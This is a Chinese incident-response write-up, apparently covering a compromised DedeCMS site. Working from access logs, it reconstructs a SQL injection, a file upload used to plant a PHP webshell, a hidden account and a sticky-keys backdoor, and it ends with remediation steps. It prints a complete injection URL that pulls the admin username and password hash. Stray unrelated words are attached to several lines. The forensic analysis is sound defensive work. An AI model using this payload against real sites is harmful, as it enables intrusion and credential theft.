從開始審計日誌(200狀態碼)發現sql注入payloadphp
利用一下該payload肯定該網站存在sql注入,且攻擊者利用該漏洞獲取到了後臺帳戶以及密碼mysql
注入點:http://192.168.31.35/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=sql
Payload:安全
http://192.168.31.35/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294app
攻擊者在優化
[27/May/2019:15:50:07 +0800]到網站
27/May/2019:15:50:09 +0800]加密
進行了後臺掃描url
再翻看日誌發現文件上傳漏洞存在spa
url:/dede/file_manage_main.php?activepath=/uploads
此處存在任意文件上傳漏洞且攻擊者成功上傳PHP大馬
發現存在隱藏帳戶,而且留有5次shift後門
修復方案:
一、刪除後門、
二、全局優化文件上傳限制,改成白名單上傳
4、對URL進行轉碼編譯
五、加強密碼難度,使用更安全的加密手段
6、在代碼層面進行優化,嚴格判斷文件及變量參數的引入,防止未知文件被包含產生威脅
升級cms版本、mysql版本、
升級優化以後